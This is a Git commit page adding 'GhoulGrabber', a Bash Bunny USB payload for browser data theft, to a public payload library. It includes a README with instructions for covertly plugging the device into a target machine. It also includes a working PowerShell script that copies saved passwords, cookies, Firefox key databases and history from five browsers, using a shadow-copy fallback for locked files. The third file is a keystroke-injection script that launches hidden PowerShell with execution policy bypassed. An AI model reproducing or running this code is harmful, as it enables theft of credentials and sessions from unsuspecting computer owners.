HAK5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-12-19 19:48:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #703 from GHXSTFPS/master

Browse Source 
GhoulGrabber - Browser Exfil Payload
This commit is contained in:
Peaks
2025-12-03 18:02:29 -05:00
committed by GitHub
parent d4b03e729b 4fd8257f22
commit 0765368965
3 changed files with 352 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

55
payloads/library/exfiltration/GhoulGrabber/README.md Normal file
View File

@@ -0,0 +1,55 @@
```
▄████ ██░ ██ ▒█████ █ ██ ██▓ ▄████ ██▀███ ▄▄▄ ▄▄▄▄ ▄▄▄▄ ▓█████ ██▀███
██▒ ▀█▒▓██░ ██▒▒██▒ ██▒ ██ ▓██▒▓██▒ ██▒ ▀█▒▓██ ▒ ██▒▒████▄ ▓█████▄ ▓█████▄ ▓█ ▀ ▓██ ▒ ██▒
▒██░▄▄▄░▒██▀▀██░▒██░ ██▒▓██ ▒██░▒██░ ▒██░▄▄▄░▓██ ░▄█ ▒▒██ ▀█▄ ▒██▒ ▄██▒██▒ ▄██▒███ ▓██ ░▄█ ▒
░▓█ ██▓░▓█ ░██ ▒██ ██░▓▓█ ░██░▒██░ ░▓█ ██▓▒██▀▀█▄ ░██▄▄▄▄██ ▒██░█▀ ▒██░█▀ ▒▓█ ▄ ▒██▀▀█▄
░▒▓███▀▒░▓█▒░██▓░ ████▓▒░▒▒█████▓ ░██████▒░▒▓███▀▒░██▓ ▒██▒ ▓█ ▓██▒░▓█ ▀█▓░▓█ ▀█▓░▒████▒░██▓ ▒██▒
░▒ ▒ ▒ ░░▒░▒░ ▒░▒░▒░ ░▒▓▒ ▒ ▒ ░ ▒░▓ ░ ░▒ ▒ ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▓███▀▒░▒▓███▀▒░░ ▒░ ░░ ▒▓ ░▒▓░
░ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░░▒░ ░ ░ ░ ░ ▒ ░ ░ ░ ░▒ ░ ▒░ ▒ ▒▒ ░▒░▒ ░ ▒░▒ ░ ░ ░ ░ ░▒ ░ ▒░
░ ░ ░ ░ ░░ ░░ ░ ░ ▒ ░░░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
```
🧟‍♂️ **GhoulGrabber**
*This script is very simple but works out of the box without any tweaking, should you want to feel free to make a contribute and I'll look it over theres a ton this could still support but I just tried to keep it simple and stupid*
**GhoulGrabber** is designed for **legitimate educational use only.**
⚡ Features
✔ Collects artifacts from **Chrome, Edge, Firefox, Brave, and Opera
✔ Copies from all profiles
✔ Copies Shit from da browsa
- **History**
- **Cookies**
- **Bookmarks**
- **Login Data**
- **Local Storage**
- **Cache**
- **Extensions**
- **SQLite databases**
Requirements:
BashBunny MK2 (probably works on MK1 just haven't tested myself)
🧙‍♂️ How to Use 🧙‍♂️
⚠️ **Important: If you have renamed your BashBunny's Device Name you need to change line 13 of payload.txt ---> label=''YourBashBunnyDeviceNameGoesHere'**⚠️
- Set BashBunny to Arming mode (Closest to the USB Dongle)
- Place payload.txt and collect.ps1 into switch 1 or 2 it really doesn't matter
- Should look like this -> (E:\payloads\switch 1\payload.txt)
- Eject Bash Bunny
- Place to the correct Switch Setting, furthest from dongle is Switch 1 middle is Switch 2
- Insert into target machine, When the light turns solid green the script has run successfully leave in for as long as possible to copy as much as possible
- When finished or spotted remove and run away screaming

283
payloads/library/exfiltration/GhoulGrabber/collect.ps1 Normal file
View File

@@ -0,0 +1,283 @@
# --- Detect Bash Bunny drive ---
$usbDrive = Get-WmiObject Win32_LogicalDisk |
Where-Object {
$_.DriveType -eq 2 -and (Test-Path "$($_.DeviceID)\loot")
} |
Select-Object -ExpandProperty DeviceID -First 1
if (-not $usbDrive) {
Write-Output "[-] ERROR: Bash Bunny loot drive not found."
exit
}
Write-Output "[+] Bash Bunny detected on drive $usbDrive"
# Normalized loot path
$loot = Join-Path $usbDrive "loot\Browser_Data"
# Ensure loot folder exists
New-Item -ItemType Directory -Force -Path $loot | Out-Null
Write-Output "[+] Loot folder: $loot"
#############################################
# Function: Safe Copy with Shadow Fallback
#############################################
function Copy-Safe {
param(
[string]$source,
[string]$dest
)
if (!(Test-Path $source)) {
return
}
# -------------------------
# Normal Copy Attempt
# -------------------------
try {
if (Test-Path $source -PathType Container) {
# Folder — recursive copy
Copy-Item -Path $source -Destination $dest -Recurse -Force -ErrorAction Stop
}
else {
# File — normal copy
Copy-Item -Path $source -Destination $dest -Force -ErrorAction Stop
}
Write-Output "[+] Copied: $source"
return
}
catch {
Write-Output "[-] Normal copy failed for $source"
}
# -------------------------
# Shadow Copy Fallback
# -------------------------
Write-Output "[*] Attempting shadow copy..."
$shadowScript = @"
SET CONTEXT CLIENT ACCESSIBLE
BEGIN BACKUP
ADD VOLUME C: ALIAS vol1
CREATE
END BACKUP
"@
$shadowFile = "$env:TEMP\shadow.txt"
$shadowScript | Out-File $shadowFile -Encoding ASCII
diskshadow /s $shadowFile | Out-Null
# Locate created shadow copy
$shadow = (vssadmin list shadows | Select-String "Shadow Copy Volume:").Line
if ($shadow -match "Shadow Copy Volume:\s+(.*)$") {
$shadowPath = $matches[1].Trim()
$shadowSource = $source.Replace("C:", $shadowPath)
try {
if (Test-Path $shadowSource -PathType Container) {
Copy-Item $shadowSource $dest -Recurse -Force
}
else {
Copy-Item $shadowSource $dest -Force
}
Write-Output "[+] Shadow copy successful for $source"
}
catch {
Write-Output "[-] Shadow copy failed for $source"
}
}
}
#############################################
# Chrome Collection
#############################################
$chromeUser = "$env:LOCALAPPDATA\Google\Chrome\User Data"
$chromeDest = Join-Path $loot "Chrome"
New-Item -ItemType Directory -Force -Path $chromeDest | Out-Null
# Loop all profiles (Default, Profile 1, Profile 2, etc.)
foreach ($profile in Get-ChildItem $chromeUser -Directory) {
$pDest = Join-Path $chromeDest $profile.Name
New-Item -ItemType Directory -Force -Path $pDest | Out-Null
# Files to copy
$files = @(
"History",
"Cookies",
"Bookmarks",
"Login Data",
"Web Data",
"User Data"
)
foreach ($f in $files) {
$src = Join-Path $profile.FullName $f
Copy-Safe -source $src -dest $pDest
}
# Folders to copy entirely
$folders = @(
"Cache",
"Local Storage",
"Extensions"
)
foreach ($folder in $folders) {
$srcFolder = Join-Path $profile.FullName $folder
$destFolder = Join-Path $pDest $folder
Copy-Safe -source $srcFolder -dest $destFolder
}
}
#############################################
# Edge Collection
#############################################
$edgeUser = "$env:LOCALAPPDATA\Microsoft\Edge\User Data"
$edgeDest = Join-Path $loot "Edge"
New-Item -ItemType Directory -Force -Path $edgeDest | Out-Null
$edgeTargets = @(
"Default\History",
"Default\Cookies",
"Default\Bookmarks"
)
foreach ($item in $edgeTargets) {
$path = Join-Path $edgeUser $item
Copy-Safe -source $path -dest $edgeDest
}
#############################################
# Firefox Collection
#############################################
$ffBase = "$env:APPDATA\Mozilla\Firefox\Profiles"
$ffDest = Join-Path $loot "Firefox"
if (Test-Path $ffBase) {
New-Item -ItemType Directory -Force -Path $ffDest | Out-Null
foreach ($profile in Get-ChildItem $ffBase -Directory) {
$pDest = Join-Path $ffDest $profile.Name
New-Item -ItemType Directory -Force -Path $pDest | Out-Null
# Files to copy
$files = @(
"places.sqlite",
"cookies.sqlite",
"logins.json",
"key4.db",
"sessionstore.jsonlz4",
"formhistory.sqlite"
)
foreach ($f in $files) {
$src = Join-Path $profile.FullName $f
Copy-Safe -source $src -dest $pDest
}
# Entire storage folder (Local Storage / IndexedDB)
$storageSrc = Join-Path $profile.FullName "storage"
$storageDest = Join-Path $pDest "storage"
Copy-Safe -source $storageSrc -dest $storageDest
}
}
#############################################
# Brave Browser
############################################
$braveUser = "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data"
$braveDest = Join-Path $loot "Brave"
New-Item -ItemType Directory -Force -Path $braveDest | Out-Null
# Loop all profiles (Default, Profile 1, Profile 2, etc.)
foreach ($profile in Get-ChildItem $braveUser -Directory) {
$pDest = Join-Path $braveDest $profile.Name
New-Item -ItemType Directory -Force -Path $pDest | Out-Null
# Files to copy
$files = @(
"History",
"Cookies",
"Bookmarks",
"Login Data",
"Web Data"
)
foreach ($f in $files) {
$src = Join-Path $profile.FullName $f
Copy-Safe -source $src -dest $pDest
}
# Folders to copy entirely
$folders = @(
"Cache",
"Local Storage",
"Extensions"
)
foreach ($folder in $folders) {
$srcFolder = Join-Path $profile.FullName $folder
$destFolder = Join-Path $pDest $folder
Copy-Safe -source $srcFolder -dest $destFolder
}
}
#############################################
# Opera
############################################
$operaUser = "$env:APPDATA\Opera Software\Opera Stable"
$operaDest = Join-Path $loot "Opera"
New-Item -ItemType Directory -Force -Path $operaDest | Out-Null
# Opera typically has a single profile ("Opera Stable")
$pDest = $operaDest
New-Item -ItemType Directory -Force -Path $pDest | Out-Null
# Files to copy
$files = @(
"History",
"Cookies",
"Bookmarks",
"Login Data",
"Web Data"
)
foreach ($f in $files) {
$src = Join-Path $operaUser $f
Copy-Safe -source $src -dest $pDest
}
# Folders to copy entirely
$folders = @(
"Cache",
"Local Storage",
"Extensions"
)
foreach ($folder in $folders) {
$srcFolder = Join-Path $operaUser $folder
$destFolder = Join-Path $pDest $folder
Copy-Safe -source $srcFolder -dest $destFolder
}
#############################################
# Done
#############################################
Write-Output "[+] Browser artifact collection complete."

14
payloads/library/exfiltration/GhoulGrabber/payload.txt Normal file
View File

@@ -0,0 +1,14 @@
#!/bin/bash
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LED ATTACK
# Open Run dialog
QUACK GUI r
sleep 0.3
# Below is the line you will need to change if you have altered your Device Name or if it is something other than BashBunny
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\collect.ps1')"
LED FINISH